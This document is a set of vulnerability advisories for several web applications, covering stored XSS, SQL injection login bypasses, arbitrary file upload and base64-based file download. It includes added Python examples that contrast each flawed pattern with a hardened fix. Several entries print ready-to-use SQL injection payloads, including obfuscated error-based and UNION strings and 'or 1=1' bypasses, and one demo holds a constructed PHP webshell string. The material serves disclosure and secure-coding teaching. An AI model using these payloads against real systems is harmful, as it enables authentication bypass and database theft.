NethServer suffers from an authenticated stored XSS vulnerability. Input passed to the 'BackupConfig[Upload][Description]' POST parameter is not properly sanitised before being stored and later returned to users. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.
An attacker can inject a malicious SQL query to bypass the login page and log in as the admin of a particular school. To do so, the attacker sets both the username and the password field to 'admin' or 1=1 -- - and selects the 'management' check box.
A SQL injection vulnerability exists in /wbg/core/_includes/authorization.inc.php due to a lack of input validation. Hardcoded admin credentials are present in the same file. A full path disclosure vulnerability exists in almost every file, again due to missing input validation. Unrestricted file upload is possible via the admin panel: a file can be attached to any publication without any file type checking.
The vulnerability allows an attacker to upload arbitrary files: the user profile picture upload accepts any file without checking its type. The vulnerable source code is provided in the text.
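The two upload findings above (the publication attachment upload without file type checking, and the profile picture upload) share one root cause: the server trusts the client-supplied name and never inspects the content. The Python below is an added example, not code from either product. It places the flawed pattern beside a hardened handler that caps the size, allowlists the extension, checks the file's leading magic bytes against the declared type, and stores the file under a server-generated name. The image-only allowlist, the size limit, and the temporary directory layout are assumptions of the example.

```python
import secrets
import tempfile
from pathlib import Path

# Assumed policy for the example: image types only, each identified by both
# its extension and the magic bytes the content must start with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024  # assumed limit


def unsafe_save(upload_dir: Path, client_name: str, data: bytes) -> Path:
    """The flawed pattern: the client-supplied name is used verbatim and the
    content is never inspected, so a .php file lands in a web-served directory."""
    dest = upload_dir / client_name
    dest.write_bytes(data)
    return dest


def safe_save(upload_dir: Path, client_name: str, data: bytes) -> Path:
    """Hardened counterpart: size cap, extension allowlist, magic-byte check,
    server-generated file name, and no execute bit on the stored file."""
    if len(data) > MAX_UPLOAD_BYTES:
        raise ValueError("file too large")
    ext = Path(client_name).suffix.lower().lstrip(".")
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_TYPES:
        raise ValueError(f"extension not allowed: {ext!r}")
    if not data.startswith(ALLOWED_TYPES[ext]):
        # Catches shell.php.png and similar: the name says image, the bytes do not.
        raise ValueError("content does not match declared type")
    dest = upload_dir / f"{secrets.token_hex(16)}.{ext}"
    dest.write_bytes(data)
    dest.chmod(0o640)
    return dest


def demo() -> dict:
    """Run both handlers on constructed inputs; returns what each did."""
    webshell = b"<?php system($_GET['c']); ?>"   # constructed payload
    png = ALLOWED_TYPES["png"] + b"\x00" * 32     # constructed image stub
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        results["unsafe_php"] = unsafe_save(d, "shell.php", webshell).name
        for label, name, data in [
            ("php", "shell.php", webshell),
            ("double_ext", "shell.php.png", webshell),
            ("png", "avatar.PNG", png),
        ]:
            try:
                results[label] = safe_save(d, name, data).suffix
            except ValueError as exc:
                results[label] = f"rejected ({exc})"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The double-extension case is the one to watch: some Apache AddHandler configurations execute a name such as shell.php.png as PHP, so an extension check that only looks at the last suffix is not enough. The magic-byte check rejects it here, and the random server-side name removes the attacker's control over the stored name entirely. Serving uploads from a directory with script execution disabled remains the backstop.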
The vulnerability allows an attacker to inject SQL commands. Proof of concept (replace [SQL] with the payload below, a MySQL error-based injection that uses the floor(rand(0)*2) GROUP BY duplicate-entry technique to leak version() in an error message):
http://localhost/[PATH]/index.php?act_value=pkr_www&sub_act_value=pkr_viewgamehistory&game=[SQL]
1+Or+0x31+gRoUp+bY+ConCAT_WS(0x3a,VeRsiON(),fLoOR(rAnD(0)*2))+hAvING+MIn(0)+OR+0x31
etc.
The vulnerability allows an attacker to inject SQL commands. Proof of concept (replace [SQL] with the payload below, a MySQL error-based injection using the floor(rand(0)*2) GROUP BY duplicate-entry technique; the /*!44455 ... */ version-comment wrappers are MySQL keyword obfuscation for filter evasion, and 0x496873616E53656e63616e is the hex encoding of the marker string 'IhsanSencan' appended to the leaked database() name):
http://localhost/[PATH]/go.php?id=[SQL]
http://localhost/[PATH]/admin-delete.php?id=[SQL]
755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
The vulnerability allows an attacker to inject SQL commands. Proof of concept (replace [SQL] with the payload below, the same MySQL error-based floor(rand(0)*2) GROUP BY payload as in the previous entry):
http://localhost/[PATH]/admin/admin-delete.php?id=[SQL]
http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL]
755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
The vulnerability allows an attacker to download arbitrary files. The vulnerable source code lets an attacker read any file on the server by base64-encoding the file name and passing it as a parameter to download.php; the decoded name is used as a path without any validation.
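As an added example (not the affected application's own code), the Python below reproduces the flawed pattern just described, a download handler that base64-decodes a client-supplied name and opens whatever it points to, next to a hardened version that decodes strictly, resolves the real path, and refuses anything outside the download directory. The directory layout, the file contents, and the plain-base64 encoding of the parameter are constructed assumptions of the example.

```python
import base64
import binascii
import tempfile
from pathlib import Path


def unsafe_download(base_dir: Path, encoded: str) -> bytes:
    """The flawed pattern: decode the name and open whatever it points to.
    '../' sequences and absolute paths pass straight through."""
    name = base64.b64decode(encoded).decode()
    return (base_dir / name).read_bytes()


def safe_download(base_dir: Path, encoded: str) -> bytes:
    """Hardened counterpart: strict decoding, then resolve the real path
    (following symlinks) and require it to sit inside base_dir."""
    try:
        name = base64.b64decode(encoded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        raise PermissionError("malformed file reference")
    root = base_dir.resolve()
    target = (root / name).resolve()
    if root not in target.parents:
        # Covers ../ traversal, absolute paths, the directory itself,
        # and symlinks that point outside the served tree.
        raise PermissionError("path escapes the download directory")
    if not target.is_file():
        raise FileNotFoundError(name)
    return target.read_bytes()


def encode_ref(name: str) -> str:
    """How the file parameter is built (assumed: plain base64 of the name)."""
    return base64.b64encode(name.encode()).decode()


def demo() -> dict:
    """Constructed layout: downloads/ is the served directory; config.php sits
    one level above it and must stay unreachable."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        downloads = root / "downloads"
        downloads.mkdir()
        (downloads / "report.pdf").write_bytes(b"%PDF-1.4 constructed sample")
        (root / "config.php").write_bytes(b"<?php $db_pass = 'constructed';")

        results["unsafe_traversal"] = unsafe_download(downloads, encode_ref("../config.php"))
        results["safe_legit"] = safe_download(downloads, encode_ref("report.pdf"))
        for label, ref in [
            ("traversal", encode_ref("../config.php")),
            ("absolute", encode_ref(str(root / "config.php"))),
            ("dir_itself", encode_ref(".")),
            ("garbage", "not base64!!"),
        ]:
            try:
                safe_download(downloads, ref)
                results[label] = "served"
            except (PermissionError, FileNotFoundError):
                results[label] = "blocked"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Base64 hides the traversal from a casual look at the URL but is not access control; the only check that matters is the containment test on the resolved path. Rejecting malformed encodings with the same error as a denied path avoids giving an attacker a second channel for probing.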
The vulnerability allows an attacker to inject SQL commands. Proof of concept (replace [SQL] with the payload below, the same MySQL error-based floor(rand(0)*2) GROUP BY payload as in the entries above):
http://localhost/[PATH]/admin-ftp-del.php?id=[SQL]
http://localhost/[PATH]/admin-ftp-change.php?id=[SQL]
755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
The vulnerability allows an attacker to inject SQL commands. Proof of concept:
http://localhost/[PATH]/admin.php
User: 'or 1=1 or ''='
Pass: anything
http://localhost/[PATH]/index.php?p=smiles&handel=[SQL]
'+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+-
etc.
The first payload bypasses the admin login by making the WHERE clause always true; the second is a three-column UNION injection that returns user(), database() and version() in the third column (the /*!11112 ... */ wrappers are MySQL version comments used to evade keyword filters).
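The login bypasses (the school management system's 'admin' or 1=1 -- - and this entry's 'or 1=1 or ''=' on admin.php) and the injections through numeric id and game parameters in the entries above all come from building the query by string concatenation. The Python below is an added example, not code from any of the affected products: it runs the page's login payloads against a string-built query and against a parameterised one, and does the same for a numeric parameter with a UNION payload, using a constructed in-memory SQLite database. The school payload, whose quoting is ambiguous as printed, is read here as admin' or 1=1 -- -. The MySQL-only parts of the page's payloads (the floor(rand(0)*2) GROUP BY error-based trick and the /*!NNNNN ... */ version comments) are not reproduced, since SQLite parses neither; the -- - comment terminator works in both.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the affected apps' tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'admin', 'constructed-admin-pw', 'management');
        INSERT INTO users VALUES (2, 'alice', 'constructed-alice-pw', 'student');
        CREATE TABLE history(game INTEGER, result TEXT);
        INSERT INTO history VALUES (1, 'win'), (2, 'loss');
    """)
    return db


def login_vulnerable(db, username: str, password: str):
    """String-built query: the quote in the payload closes the literal and the
    remainder is parsed as SQL (OR 1=1 makes the WHERE clause always true)."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()


def login_fixed(db, username: str, password: str):
    """Bound parameters: the payload is compared as data, never parsed as SQL."""
    return db.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


def history_vulnerable(db, game: str):
    """Numeric parameter concatenated unquoted, as in ?game=[SQL] or ?id=[SQL]:
    no quote is even needed to break out."""
    return db.execute("SELECT game, result FROM history WHERE game = " + game).fetchall()


def history_fixed(db, game: str):
    """Type-check first (int() rejects anything that is not an integer), then bind."""
    return db.execute("SELECT game, result FROM history WHERE game = ?",
                      (int(game),)).fetchall()


def demo() -> dict:
    db = build_db()
    admin_php_payload = "' or 1=1 or ''='"   # admin.php login payload
    school_payload = "admin' or 1=1 -- -"     # school login payload, sent in both fields
    union_payload = "0 UNION SELECT username, password FROM users"
    out = {
        "vuln_admin_php": login_vulnerable(db, admin_php_payload, "anything"),
        "vuln_school": login_vulnerable(db, school_payload, school_payload),
        "fixed_admin_php": login_fixed(db, admin_php_payload, "anything"),
        "fixed_real_user": login_fixed(db, "alice", "constructed-alice-pw"),
        "vuln_union": history_vulnerable(db, union_payload),
        "fixed_history_1": history_fixed(db, "1"),
    }
    try:
        history_fixed(db, union_payload)
        out["fixed_union"] = "served"
    except ValueError:
        out["fixed_union"] = "rejected"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

With the vulnerable login, both payloads return the first row of the users table, which is the admin account, regardless of the password; with bound parameters the same strings match no user and the real credentials still work. For the numeric parameter, the UNION dumps usernames and passwords alongside the game history, while the fixed version rejects the input before it reaches the database.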